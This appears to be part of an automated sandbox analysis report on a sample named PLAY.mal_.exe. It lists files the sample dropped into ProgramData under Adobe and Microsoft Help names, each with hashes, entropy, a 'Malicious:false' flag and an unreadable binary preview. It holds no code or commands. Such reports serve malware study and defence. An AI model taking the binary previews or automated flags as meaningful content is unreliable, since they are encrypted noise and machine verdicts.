        Preview:*.+V.vV`.1lx..]..,].;...,...........+.5\...........T.....+.~9:.~.D.. .C.M%.14t.w....u...'AWj..t9.%v..S..\......;.}.Ed....I.d|G...=.oD a.[........8.....s.K..J.O..H.&o^.x.*..'.^o.I..B.....V..(.G..............c......(.cq..q.]4di..S#.A...i.R...?d.]te......N..F..5.5..>.KO.{...sUA...=`@..B...n..m.4.K.B2.ZUMCi.....\.d.%9G....}..........QO$..U.P...d|.Nx.xq.H.....bX.c.j..H.....>...q...R\j.cJ..N.gE..MW...&qa...v5....[.Zl7....a..@../..G..#'...j....%..1<...n.....B.....e..V.+]%.`cu...C..~..#x...0.|.N.2...C*....)...)..w..LF.>EF.|.|.~k..V|.;....G........P.x.`b.......WBQ.....G.KC..'..a.d..q...N.G.Q'..M....M...+...."...A.....".}...T?...)*...G..*n..{'.fz..."....[/.eT.7.h.^..K...a&...]|..LA...(.9Jb..j..%.(j....9........N..(......0.eII.)..3|&..r.nq...y2$T.^...S...{...m^....<^.;#.Y.?v......j.+Z.......*....MIy..?.2...~...5.u.5.....SSj.b...g....6.|...............+]2U.x...!..9.X.9f..,.(..H..\.V..U+.K<j.Y(.....t.....+-.h..f.l..UD.l.hff....9D.>...r..../...K....b...

        C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\abcpy.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1688
        Entropy (8bit):7.874048756998993
        Encrypted:false
        SSDEEP:
        MD5:915654CD8D47EEE09B7D231EF16291D7
        SHA1:742A72E54596829216E770F101F53596270A4614
        SHA-256:BEE6EF660A83C088F845B881753F5FB56EE1311422E9D3F1B69B993FC6B7D9A4
        SHA-512:894ABAB7EDB098F30C66FC5062A8B6D147646051AFB04FE53B900417F788270A17C4D1F7FB5278AD639FE2D73097FD364FD00A6A7D4E99DA0690ECE77D5F5630
        Malicious:false
        Preview:LS;'..B!@.........-wv........@ M.D....*1....`}..JI.D....!......Q.T....=%.x.j..."...(s.X....1.......`..rk.....m)..?...|>y..w..L.E..}...........m.k.e....5..J^6c...2.......C..sH.'O.0...)..T...`Y..F.....%n.L.5h..q8(.zN...x.........$..+....xX.>.dU...l...bL..m`'~.....pg..q..D....N.......{.....L....'.6.j......x.. ..X._..... .......t.r...B..O...c.zf.y....A.$~Q.P.......%!..U.~.N.......7....KS~....k.......`n.H.5HC....."....]. _..i.]W4.N..F.v.;..f_...rO..#{:M7...b....d..z....fh%.t.{.e.).X.t........Y........!.9..f.."W....k..U5.K1.....8...."/......8..\.5.sL...lX..=._.....*..0....$..=..N.qX|....T..U.|.!.I>...........................[.M........@.O+........S.&'...k..6l..v.#g",..A..?+..3......{ls.........%[...@+......7.....g......0.Et%.!..w-...k"...u....w=........ ...>~.i..i;........k.:\.. sb.x{.OF.mr/..[.P.K6..].y?.._..u.WB...J=... .....y..z...a.cq....$z.9{x.DBQ!v..E.|{.!8.(..N3..@.. /...(,P@.u.X."@@..p%..0.#...~@;..7yf......>.}J...........r....e.&..

        C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.ini

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1288
        Entropy (8bit):7.838401423848566
        Encrypted:false
        SSDEEP:
        MD5:253E08C25096908364CB69770D526524
        SHA1:E58E0096A69ED717A35AA436F27BD6D4FE8FD0B8
        SHA-256:904F63C08479B2F3C52379666B8B5C5507B48CEA2FC4B9646F3C2F8D40BFBDDF
        SHA-512:8B8C0B9C68A9B871C685097F843C5EA8FE7B02C3ED8EEC12542C88F9A459468FE6992B805C128FDDD1F60EB2B20DDA046D2794D184A68C9C4FE320AE41C1E8CB
        Malicious:false
        Preview:G.eYs,`5.YNK..9.....6\zZ.N.C)......T10..$`_..N..F..9.....z,..|.../..T.s{....Qu6.6ik:..... u..#...>r.X..%.#.Qq.. ..B.]} ....$..Kt...1t*...JH{....i.....c.$...3+.).nf...!n........e.?'...p..g..9.^db.a.Cr...Z...I.......T..U.|.!.I>.............................~T..K..=pA...XSR.....$....l`y.#....}..."e...P#;T4.Ay3B..*n0:..Ms4j...e...l.s.1@......F.t.......?.3.D|.J.+2Na.h.7...q.f...3.%.....!..l..x..i.S0..'.'.BZVt.K$.|W..'.L.|.vl.z.... N..F'.1.t..d./.m..=n..}.........}.yE.$.V.?..h.3....s6|V>..q}.HKc.B^.UN.r.rP.}.{.Z.$.....0q..1..@..1..@].H.EU.C'...+\.N.E.=..z.P.t.Rd.a...{...4dXI.b..X=....)0....c.N....A.J...Q...A.BrSM....?.I[.....H.......0....js)...:.......@`..N.....%....l...5Q..(.^........j..<}U.ie.x!....pH._..>.)?.).@B....N...B.$V.!...Oq...&..W {h"..........a.s.9][c.Zd...r8}j...e.. .m~.r....6..y1...y46..~D....-Q;....\.c...Q..)...3UE.2..."..z.....6./P1xW/.r..T8p.;..8H...O'.....V(1.C}lo......@...t.}[..?f,FN......[..R.(..<X....D....`X...z.6.......".h`.....

        C:\ProgramData\Microsoft Help\MS.DATABASECOMPARE.16.1033.hxn

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1496
        Entropy (8bit):7.86804391972879
        Encrypted:false
        SSDEEP:
        MD5:70E6DD27549154712E6E85B324484324
        SHA1:F436FB0617F7213C0D563EAF9A32D45E09C8B67E
        SHA-256:1DE9E05156C7F45DCB2D00C4DBCCEFF19A5C26441BFFDED332C77116184E35D3
        SHA-512:36AEBCD0FBA9F6B79A29EB2242871698CE6F6BEF1A4131725356919BAFACF039C5C835A610C8D42419FD25FA5083DD600BEB5BD3399224595C4AA7470E094259
        Malicious:false
        Preview:.SM......n#.d..j.k}..^..(....RV...K7......%.....<.~.bStj.4U.1.$.9..p.y..8......I..S1I.p....0..M rWC..Q#.{N.0...@.....F.......q.7...U...3.vp..c4.Bv.K.-.n..,......R..uY.D.fO6..H}#..)Eu.D(.1a.4.*....F..D[)...R{.:E...........H.v.r(S_....;.....`.t.?NMC?....%.o.....i.|Q/...E..|.....|g.y.....*..%.<9..8.:.....;..`.:..M..8 ...Q.......|...........:.^z....;......z0...W.|.Z..9.Z.8.>..).es...f..q+>..p}r$c....h...t...VL.W.3...T..U.|.!.I>..........................q.(H.(Y..(...I..B...s..Fpi....kW...").....;.../...t.q..p......{..P..f.. .....8.k!.%I...L]X....q........&.....k&...a)l(...!.&.).........T..........Z...{..9.k....$...un.U)..D.......nu...E.rZ(u.:!....Obi-.^...6..@|........|..T..^.h.I....<0{....V...j*...G[n..6.bc..=.......$.c.Q..................F$H.|.......[F7..A9..XX?......}.=.......1..=b..l.m.."?.2..H?....]87.(.e0...)..4..o(."..i..n.U.......M5.-t.>.Jp.f.#..SpDn..6H!`...<....s.r*Z@.s.S..x.w.pQ.:|.q..r.g.<..h./.e.`.....Y. ]J.....U..w.K.a.|S:b~.).

        C:\ProgramData\Microsoft Help\MS.EXCEL.16.1033.hxn

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1416
        Entropy (8bit):7.8565102046837
        Encrypted:false
        SSDEEP:
        MD5:E21585C8037F3880A3F717C837CC8C95
        SHA1:F1243A6FCBA7D10FE7A4DD0534BC8276BF06E8CC
        SHA-256:2CC0DBD13DDB30C2DC6B3615C6B3339D3D24E253DADF95DC852D042E8D71C404
        SHA-512:7F26BAC26484F758BF0B3F82DE54D94917F16CE2CECB4C6D2C116A9D28BC6E417459EB20BF87CD02A66C88ABEB7A708DD9040375808B1CD8BC5A3F4FE7FABD9F
        Malicious:false
        Preview:=....p.g..)].."(.V..[q...!F P.bp....V.._s_.......).k..,\..E:~....b..........<.R.l.......h.Y.~x.!.S_1..$a......6.*.i.....8(./..iB....o!....7X.pR......z...e.8.{15...;.YB..<v.f.Nt.7@..a.T..qW...k.....5iYs..#. 8i...i&\:.i....t...~..E.@B...a.h-8...@_V.:.....(..._....M.v.p...../9.$..n..c .....y.`.e..........}..uu.2U....!.H....;..H^...`a......T..U.|.!.I>............................C&2.>...^..E.8.'.*....x.,.....x{.Ak."@......v..f....b....7`..h.?^.>...[....1l..5.L.3.p....!v*4...........).c....n....T.....L....&.PS..K..]<E>,-..<...U!q+.9..B..s.&!.:.:_..\...........!.B..(.|f..n......o.z....d..R..J..@..7..p.v.........!.3.q.0...}..V%.....8.".;.......'....p.zZ...........o....|C.3...*..,j......fm.5.M.....`.....*...l<-.x~.......jt.0.k.........j.sVp...r.V...2.~.}...O(..R.#..;...r.=.5.,-..fq.u....m..K3,cM.H.x...|#m6.o1...j...K7A*.5.....$...n./......mYW...|...~......$.z.QGs.Eg;B.]!.>.6t.o..b.D..........-.EI..].^.F]..d.-..x.J..[.p..n....Dn..Ba...v....F..V.&z

        C:\ProgramData\Microsoft Help\MS.GRAPH.16.1033.hxn

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1416
        Entropy (8bit):7.841130070235249
        Encrypted:false
        SSDEEP:
        MD5:E219A576C0A9C0C1D669F8718EFBB7B7
        SHA1:A0D6C5CEEB5CFEC95C48A2B7A025540A7FB96E48
        SHA-256:B9110A1BBE1D7B50AD4D1486F95B74153AF70EAF69988E60E8DFB31F1CFCF030
        SHA-512:A46B3DD6AA3606FB48440EA54F2620380E644BB9FE6F61831E6EBD59E77FF433B6E5E01806E5BE6886E5A89FBCED898A273E6C7B89706DC85470879CC3DBF567
        Malicious:false
        Preview:#}l>("d.]..ns6T..a..'.$.A.4_...P,.i_....n....U..g..}.A..!c.....O....{.............h..N..P;..#..Di]b.........2........Li...zD..%Z..6......?.....i.W.l.....b..5.%J.!..r..^..,R....s......67{.^...@L.....UY.t..E...V.....p~G.a...MC...&.C..c.Sj..(.|t./j.A_.....r........@@IN....a$......j-_}.NW.w.f..._S].m....nv.9....Y./...P.7.,x.LW..Q$...n.\Q..d...T..U.|.!.I>..........................n\...T...@......7j...`.~e.7....l&.G....r....+.......9....:.......`[..{......~.....lg....4..U....B..$r....U....Y.].t..@.~....(X......>..ThT6...2.........jB.=.AO.wY....'.W..`u"c.p..p|O.X...S`T..C.t`...8....[....*i.r3.t...y..i....@.I....0..Ff.@*~..S..t.d.X+...(H../1.eR.t...#24..m....6.'.~n.'C...M..Lb...\..E.>O_P..\i5.`...h......B.;.Mq..Z.....H~d.V..3.^.q....g............_..h..t..@.."..A.<.0<R.f:Z.........w.v.-...8........!.Z7czy.Nn..t....-#..2.S..._...../..3.....2T.4.s"{.{.=:.P%.lt.n......;Y.M..j..@...G.....).M3.i.L.....j.NbFwA..t..F.G....^^....x....~M.$Q..w#...=......

        C:\ProgramData\Microsoft Help\MS.GROOVE.16.1033.hxn

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1432
        Entropy (8bit):7.866838944759726
        Encrypted:false
        SSDEEP:
        MD5:BAB86621F32E0DB18BE8020F03D6E246
        SHA1:D8AAE3995AD2120DA9B61F63025B6E8D2F1C4A5C
        SHA-256:67865B78B95916A00A0BAB57938A07E9B47C297434C9A54624F3685EE73F5A7B
        SHA-512:729D03D2E6139CD16A95BF0C89E2F5860B9788F6D632674D40C9230B1D9F815BEAD17AB45AE51098C93D64575BC277F67ABFFE3063E3D325229904AED5B5C900
        Malicious:false
        Preview:R.gN............4:}?[g.Ru.2.....O..C..C.....l..|..=Z.0....+Tp).66.~..Oh....t]...)..^+(k.%.o....6....~.6..z._.......D.s..3..t^WX 4oX..p'....8..X....'.%S..1+.:..SP4.......x..N....c..9..@Im.e...u.t1...<..[9z...*3..._L...7{.M.fh+..q.@..u.r.X..~..i....L.WrNtFI.............-.....^..........X...dS...$Mt.W.O.[#lg..8wA....p6."R....xb......|...."....-L6.Y...T..U.|.!.I>..........................2~0......L.2.....`.a..r....1.@..o.>.?..,...Z.U..;|h..bD._.+.GK.h..^).../3.qj_..6B.a.=..@.....`E.`B..^.B<.bfx%..[...........Z....>1i4.}x.....F....[/..............x...c.lG.Q.5U."'..lu.-J.k.J.l.t..E....U-.>.v..../u...o.`?.!.. ._F.:.........W=....oq_.=..[A(.e..x.....~T...W..4..Ww<...;.:c....f.Kv_.L..3....i.@......&,..T..8../.-. .R. .......g..O....;.J/.a.*w....dZp...^.c.L..x.m..7z.u..?..S.-c......kc._...e..|..+.V.D........+....S"...6C.e.N1.......#A..... .!7...8m.Ks..=.4.....6.f....kA.*.<.......JT..O..g.........DN...BN.....N.Sty.~..P..t...,.d....5...u{....o

        C:\ProgramData\Microsoft Help\MS.LYNC.16.1033.hxn

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1416
        Entropy (8bit):7.84915129563854
        Encrypted:false
        SSDEEP:
        MD5:673C90DD58D23B33652BBB84B599B388
        SHA1:4C92C2DA91679FE74A384694C687E261D76B514B
        SHA-256:88432D16F8EF2A7BBDEBD949D85527745575CE124AE9F9790DECF8265EFEF167
        SHA-512:409C35B29AD37FAA5A12BF39EA168A8015D6B788D835CBE873530D2E3CE95AD9A978E23B0B8DFBC9D8023A668F42C5FA6C9A54EECB5345C3FA1E45A4A25BA0DD
        Malicious:false
        Preview:..gB..s.g....Z...".Ji..;fY!I.J.55E..'..Gaj..C....2..p6.../K..H<~j..I.N..jP&-.`S1.Kh@.%.??.....q.[k..U. q......k.3Q..mA..V.[B....[.i........FpE...H..`.m..q.Tj...P04.e...lCb<........D]h.5.-..z)..J.5,.T.......;.....@Q.......S...r:..F.B......w.Tz...G.#.`&d....*.;.ju..I.....$....G.. .>.".......?.D`7...^E....xc.7.Q.K.!P)..z..J.}6O..:....T..U.|.!.I>...........................>.N...D.uI....t.fz....)#..C].9.7:zq.p7.`!e.%#v.?I= ..F.U..8.l.@.u....>^.......f.L..J.n...[.....e.<.B.J.l.5..C..m......i....?|i..a@...g...j.9..4..W,..G........2.P./.....Bi.....$M.X..n....[k.d1N._C...+gVI.H....J.|.a....BT%....J.1.M!....d.....[.3...@.6.pn...O....}.E..`...<..,.Set.....vyL.x.#.2..1'...g..flA....F.$Pa{KJ....%..]r.3..A8.....A.....a....\.P..)..|....}^...4.G.!.....\.]d.....x.=...|.4...9>a.0...._...|......$!d.h_..U.@.buK>65......7.[.@mo`7z..2I'Z...R/u.a.d"M.:-{.F'.E.......$.9.E..^`..x...7.J.P...w.i.|.+.......}y.Q.B..T..g....as.N.o....9..*;..g....]i.........<.5.....

        C:\ProgramData\Microsoft Help\MS.LYNC_BASIC.16.1033.hxn

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1448
        Entropy (8bit):7.84535243496695
        Encrypted:false
        SSDEEP:
        MD5:B5DC987F47270CBF940AFDD4E7677330
        SHA1:35AEBEB316E9DF3D888965B004C79DB6004195EB
        SHA-256:4BD3E8E6763E2549ED561617E9C7A87468270FC60759AC969BA28F47DE0AF280
        SHA-512:4777AB0003CD565F095F5ECCAC7C9ACFA5C2FBB8DFDA0375560DB30BF38A663C3CBAD39D6C5C0B06DF92C09AF6156EDE06E5426A2828B0FF53EA90E0922FE6CC
        Malicious:false
        Preview:.a.w..e']N.....B.FMt.y<....'$.F.>.....z..f.K.c'....\X%.....Ad.J.........M...t...N.|.>...S.........1.".zj...y.!/ZF..*......>....4.5...:...g..,5.S.tG...D.$...aF..........!.{..8!<.E..U....~X..7....F .....O/.j.B.....<.>.V.....5F}a..9N...Gi.3....WQ.+..L..&..<1.....T.+...^o.U40..Sk.h..7.!.f...x..vs@..,#..e...q ..".......P.@....wZ.T...*.......o....xU[c.S..im..i.~.yjg#0JAn...T..U.|.!.I>............................W}e..&y..}.G..H...m...H+E%:..e..Sg....K.=.....6..t..P.R.....w.HA.'S...).7.R..6]h..WIr..[$.E..L?e..L`CO]..KE.W....NF.b[.B..B..O......9.o."x...r. ..BM..M..:.Z.....g.f.T...4.lnwr....A.{..\.85w.U<..[....=.M9..{4Ey......j.&..5{..?w3~.../j...A....O2.....3.}..g[.c."y.1.gt.U.$V8.....>..KWvx...M...L^..]%@...........9.i...|P.~.v.$..lz..*9g.....OI....z..F..;..(.;......:E!t.~.T| ...V.b....H.8B(8L...HhZFl...<..'..q..%..)........39P...E.hX..b..3Vf...v1...djQ.c. q.9...YV..8.]~........;8C..Q..G..?C..u..2.r.w..9...'..v}.X.@O..$I...].A.....\.o..%,.A~<.M...t

        C:\ProgramData\Microsoft Help\MS.LYNC_ONLINE.16.1033.hxn

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1464
        Entropy (8bit):7.865413327899979
        Encrypted:false
        SSDEEP:
        MD5:37FA42AB4AA141958271002A9AC7BA51
        SHA1:7001DF19C4E85AC44A5F30B322511D1845AE02D8
        SHA-256:EE7E124AA1DAEF18D3F60E55EFACE027B907409B6603F4EC1F00F8C250D12548
        SHA-512:931F08872AF8F6D38529B4A8A1DC39A365C4081157CEA77C63341E4E8158EA7E28EABA393F73B1203C2513BE47AE22E99E31F818CCFDB9349E9CD4B38336CD07
        Malicious:false
        Preview:...-..7..o.2...Q?.O...z.&Y.......%."i.e.j}. .."Qo..<C....h..k..B.<....g1Fi9.m..-.y..P......^..K5...y.s.U..dG.......>C.o.. .v..S.k.......8......Qx~Y._NbF...H..z>.......A/.M.. ..~..2>.e.,............zX:G.W....O8.V.<..Y.!..>........#..y.=.B.)i)5=.<....."(&...mt.S..._........w...2._gt...P.._..F.o..oe.~.l..........w5y.>.....n......c.....coQAQ/..e.&.x...K.1..\f..M3[..$.U9<..=Y.,.v.W.....T..U.|.!.I>..........................9...a&.fH>.zc.-V%=.4......;..H.....Q.H...N0.u.....\..Dh..4.N..).r..R.:'CGV..z%...i6{......l...%.......*...By..L...T.,j.Jn]"ULi.H.........i.a+V.:.\...CE.&......H...p|...O..E{..$....|...E..!S.v...-..>.*.(..F..n.e....X.h2.7...f.J(....).z..a.O#...........x....p.f......U......nS.o.bC._..dp.....rg......YM.[h..q....k.5...kV?..4...MT.J..Pl..+<f....5.....6X....z....g.......BL..Z...I.a.Hq....p.B+....Z.....d_J)...[...^...L.@A..F.m09.C.....I....4 .:._..S.~..l5.\}.I....rL.."......L....QS"d....-.....h..T....]....,..HY......]....]..E..r.

        C:\ProgramData\Microsoft Help\MS.MSACCESS.16.1033.hxn

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1448
        Entropy (8bit):7.8519896024483025
        Encrypted:false
        SSDEEP:
        MD5:13D892EDD653D472EF976F9240AB5257
        SHA1:FC099D08CA2D61738A0714B4AF7F16456A0307D8
        SHA-256:3019D8BE6857263AC8F3439D87A24C6CC8490A4474BA86633B3EE4757A0D4763
        SHA-512:6084D7D0F7AF9B12AFF6F22D1A693B6CEE0D653D9A1844E621B8773EDA507B6CE847AA303B092C3D76631F2DEB28BBBA02C3B0C5AC89CA3774226AE9C5AEB808
        Malicious:false
        Preview:...Z.O.r>U)...lL......).L...)`..'.S..RCIkU......6.).G....T=..*}..............<&./b..e....'..).D......W..y.....].p-...Ta..a....&...>....ZIw......&......p..K..b.8]...A.m1.....v.o.........i.14....)..S.....k$.X..P..Sg..........N.J....>L..t....l.X.C.......k...w..$.d..G.*..D\...@.h....aG...."X......UF...a.DP.8`|.....jf.u..W1v..4t..CZ...S.w.O.....>./....Yct...QVU....<.v...T..U.|.!.I>..........................ii..E..E|.e}.%.>/...V.O;.$..<...m.%.Nh.L...&.;X.].^.T..-...X\.E..x2U.>.....g.m.Y...[S:..*&..................+..._.o6......osMJ.u..J~........O...]w2..9..0.W.\.W~..'z-........B.\...v..{.....`....m.G..e...9.....C...X.v......Tr....{.V.Y......V...)...t...~$.......JjTq,b.....@<......y..b..)..6.=...;..h.25......(".6.JQ...E.m..X.,C.m....../...O~.z..pD....07.`NJ.......0#V.q.GbX.X.K...$?.A]...|7.....Z.~h.c.H........../[...ZqD.Sy......9WdP.EP..jjw.HH.DgF...:nS....FHq.....k....q....~..Mt.....gw....>27......<.. J..bp9R....QQv..7@..1&......DTb.Y..*.G..D...j

        C:\ProgramData\Microsoft Help\MS.MSOUC.16.1033.hxn

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1416
        Entropy (8bit):7.844357465702022
        Encrypted:false
        SSDEEP:
        MD5:898137E80B75A3663063101ABFCCEC9D
        SHA1:E3C5FEE8C48B33FDDA9BC0DE7DE7433196D68284
        SHA-256:F326992CDDB8FEB97E6B12C69D8A096B8884DC214A235C501CD6D2CF1B788B15
        SHA-512:52305B1FB12D1004846373A227E83C65A24FD69B29AB343DD2FAA525BA174AE0473E26872FBDF529658D9649FFE65361C5850789E84A37CEAD4EE9A0B46A278B
        Malicious:false
        Preview:.Z.g....Q.9"... k.et.M.....\O..v..(H.l%qj.#9..|..Z.~....K..K..WK.i.....y.....2U.G.h..5/hj../.&.0..Pf..jR..E+@....&G....u$....".jW....3.....F.X...qh.V........2....vz.d.!.%hP.g....x........A...b..5......@......g...7...P.....cMAt..`...p. \...~..b.h...q....y..$.&..'A.....8*`.[.Z...e3..d..l..l...f.~...6...J.n.}..g..m`t3.../g.\..x...T...J. T....T..U.|.!.I>...........................6_:`.........M..w...na07.C..4.E..s..J^..sS?..:6...j..P.....9...`..W....SN-...P.P..P|&0..s.........>O.~d.6.....2VOk....&..`..._..%...Kqia.Y,....L..&/.............a."eL.M..H......%...l......Zo..t.oW.....\U.e...a(=..i%4....t.g.....t...ux..=.R...n.^kr..Y....5..XB..@....D..O....*.fV.i.F.l."h".cvvhyN.1.1.C.......N~^..<7..p.h#..$..oP.//s....9...Z..fKv;J........3b.....q.....[z.x.d.......~..#...u..-...V~...Q....."..z.r..'..5u.g...s..0O..h...#..=.C..W)...._*.k n~!W.P.".>...w...p....]...R.{..5........z..t:.X....eB..q..]....Tf.+.L.6..@..w4.o..Ei.w..1.X.Ul..........H.d..r...b.C.

        C:\ProgramData\Microsoft Help\MS.MSPUB.16.1033.hxn

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1416
        Entropy (8bit):7.8592683158986505
        Encrypted:false
        SSDEEP:
        MD5:2EB290C53EFB17A0BAAF369BD996E107
        SHA1:59C8DB839B743BA25397F03BFB8A21379D028688
        SHA-256:A9DEC77AB887AF3F0046FA0D0AE63682F07A3FA510BAE48C9A3B35E00596FDE9
        SHA-512:75EC1302756E9FD846C53C8FEC1005971FBC3AFF174C63AB7C6563700802B60F2CAAA8D687AF301D1412D2BD2D6501760F1FDA5A85CD9566D683E0F231B2951E
        Malicious:false
        Preview:.F9S5...{m.g......"..&...&..7@.u.....x.?DAK.....}F......h.....[|3.h...3.x.wR....oD9..M.]..\....zQ.m.f..6\.J.B.'..m1...*0.....}..G.f.ib.^m.6.q.%>.O.....K..!:..b....q..G.9z...S7....a..."..9.GXt..Re...39.5.{-.i....a.$oc<....T.^7[.M9..*.B.IG...uWB........~...mm.,ik.xe.{..A..m...R....S..`W..xOo;Qi.$......A.P. ......^8D l..).B..3.k..3...T..U.|.!.I>..........................O.....w......@......0.0...9].l...U6.X.q$.8_..Q.....^O..R..}............|...[j.X...v}..,....`d........a.q"...x....l.~Od.E...w..C.]9D.6....D..%e|`|3....n.t...`.........(.4?.V....Y(.....#=.1.G....z.N..?RP.D9.Q...e......f.=.B....b.!2..R]...]..r....n.p$H..:......._....ap*......v.....Soi...{.RW.....o...oZD..(...F....T..C.)>..11.....H..G..EZ.H...>Rc1...f.7Zb.'._..X... n.e.Y..+..A.w.E.vacHI...U;.'..b...|tp...y........:..E.....S6zh.H.{...";.@%4..."..)...q.7!.kh......0.>e.D..d.z...'.'.Ag.....s.z...r-......Dph....M.O.x$.w.....:...f.2%Y...T..C.m>J~.&#....Pn...'...w..._.$f....T.ik

        C:\ProgramData\Microsoft Help\MS.ONENOTE.16.1033.hxn

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1432
        Entropy (8bit):7.814722829396364
        Encrypted:false
        SSDEEP:
        MD5:947AD8EE0630C35CEA67A3646807E22A
        SHA1:4C2ABC1257E52AB7984783C4F666E375F63E1BAB
        SHA-256:EEE0C02EEB4BB6CDD3A227E40D6D5AA46D7F9BFAB42B919C915E8B4F75BA8637
        SHA-512:8BB41539078D9BF81538E129ADEEDC5A31974E0487530F0F06C8458472E4A457AA4E51BB22576871B4B1EB72B8D96AAEB939DB85A854F613851AFCA286D00BD3
        Malicious:false
        Preview: t..V...]TX...U.@...L..t.-j..............f../.....b....6"H..........64h.1;6....&.f*1...O..]7...+..,~..?Fy...S.r.`.......@....W.G.1Pm.o.%^B...J....M.....C4..VlO..@..".....$...T.W.p.#..S._.J.tE.n...}..l@.~..B...c.......7.b._..s...+.xv.?R~u'...j.._.4...(;...Ut..s.x...Mh.[`........%......f.....+1S.@......P.T\K........z..1...2Mf.7.4..Nj;'.)c......A`.D...T..U.|.!.I>..........................r......G..Njk............_'...#b...G%.2..wNg..j1.A......9.(8W.....(..EP.w....%.X.X.K~..q+S.D...._.|@.>.%Y7...".0X.....$]KWJ...o7.!....ov.gg......Ju...I..}+?...|...+...2..%._i.Cz.......ez.YR{./""....j....=...Zg....m.....z..\K..E....u.&...(N....W}......s.bC....mU.k..Z.<.O......l.~^=}.*.h...+&t...q....DT..j@&..p..x].{...*..AA4j-E..E...x..g.)....@H....w..BeOI.J%.0.x^6z<......1..4..V.M6{..E{...!%..DNI D.Y....f+.Y.Sw@S...H.....-@.m.+....tp6...Hn=U...s+..M...Y.z..y.IN0#......"A~....R..%..Ym..z..^4._..)....#....n...`K.fu....v.p..A..,CL.j.l.;r.F.....A{.:.~x.:..

        C:\ProgramData\Microsoft Help\MS.OUTLOOK.16.1033.hxn

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1432
        Entropy (8bit):7.84646828989208
        Encrypted:false
        SSDEEP:
        MD5:750842DC44EB331CB41A2BD2C6D11047
        SHA1:EA6394203DF446FA85C6D80B0F4AB8F7E301CE5C
        SHA-256:54E18A0E1D5085709D6E1D02A606E3F3936696414365799DDD5084D874160BAF
        SHA-512:D687C5346B56852E78A818C85FD7A0E36EBBAD0C9CE43FE6D24C3D4CABC1F06A8F2F1C3D0C476A70620E4446A647509410A17710B409D31C057E27DEEEDD4F39
        Malicious:false
        Preview:N.F.4.....[-...x...Q..]H7K;.2....+"8I]Z..x{~....0.Az|...3...["c@.]aT3.M.%....\.....ZS_.[.....n...$".K\....d.(.VH|^.G..*.r?qq.. [..O.Z...... ...4I;...r|..bG.x..F.qp?o.]..L.....iW<.._eK3........>....R..5+x.M.!$.8b...H.-.o...m[.j..Y..m.,...l....@$V2..}...........i..M4+..;.F..1..a.6.G\.,.wH@..gs.(d........9.IbO....w.......v....5..<..jw.Sq..T;h:x.S.....T..U.|.!.I>..........................H9.I..QI.].....?........P.A.LY...Y.3.d@.....F...^.r{.*n.=x0...d..O..3..H...$}..\...IQ...._u+.X...L..F S.Q6(m.=.K..C].Dg....!.<.R..../......K...j.........k.@..ZB.......]...........d.pq.X.-o.f.m....Z+.Mq........."}.[Y.}51'C.......;_.......93.:.6.r...ds.t...........d.G.....?....z .Tl[.......:..:\.Z`.J..../.!y.O.1...5.FVB..R>.`W......>.>.b.!...H)y.........{.....|...........K..-.....t.....mH..q..v=..E.io.z.t..M.....A.x.m7`......l3]...f .k%..}>$ G...C"......g.5U..N...........o.....n2m..M.h....lPS......jN5.....|{.......lF..$BR.x~}......f63.mX....2+.F6...

        C:\ProgramData\Microsoft Help\MS.POWERPNT.16.1033.hxn

        Download File
        Process:C:\Users\user\Desktop\PLAY.mal_.exe
        File Type:data
        Category:dropped
        Size (bytes):1448
        Entropy (8bit):7.85870039886199
        Encrypted:false
        SSDEEP:
        MD5:B4504428EBBEFBA508C3F94F0DEED264
        SHA1:16C994460BE88B2BBC3C1A89A6A1CCCF52B39572
        SHA-256:E2D17C8BD49FA993832904B01DD3221909774D60B8353CD3747B18F2E55C88C0
        SHA-512:14AF57C074A58C07AADF1012A4018727DE74CF07FEAF0EC46A1561DC7F0E30A9221395FF310816C868D2287979B16B2CDB298261CDF009BE93F4A493FD871110
        Malicious:false
        Preview:!.vg..[..C%...<}.....e&R."(/...U...a$.."....C.N..at9Y.U..;........H...=Yh....(v1..[S}.^7J..?...O.(...,.&.q.i.b.....x../|...P....V.<.6..5.A.....{._.#..6......z...5b..U......{.E)Cgy......F@..i.r.........r..4..(..M.U.....jO...)..4...n.........L..a<....~......u#L.,..T......s..X.n";.}eu@.s.5.@...P...B..8'.....9..{.....+...Q$..H..].......v.I>}6.p.]J-..M.=....;.U....T..U.|.!.I>..........................C.*..|.~]w.H=s..-.U.bi.(.-.!.Q..D..<...g..:f....w#.....v%u.:.H.'....f.e.%..X...........J....Mf..&{.....0c{..].9.3..Y..C........P~yY.F...=..Ip.....8....B...7..U.....(.(L.B.......w.G..c>..q*.K.j....t.9.Nx5....Bf.....a.'.oa...;^A...."...,L)...<..~.l....!....G..{kr..qS....*v3z...."U+=.4..Mp .:..r..|'.8]`....j...3.H...<.Q<...%......sq0*...i ,.o..Q.....$z+kt...[..>..!........./....t._.......5...D>....?.....Tfe.....d....o<..6.|......o...t:G.V...d...>.3...j...xu.]...o.=..1.<W.)[...... 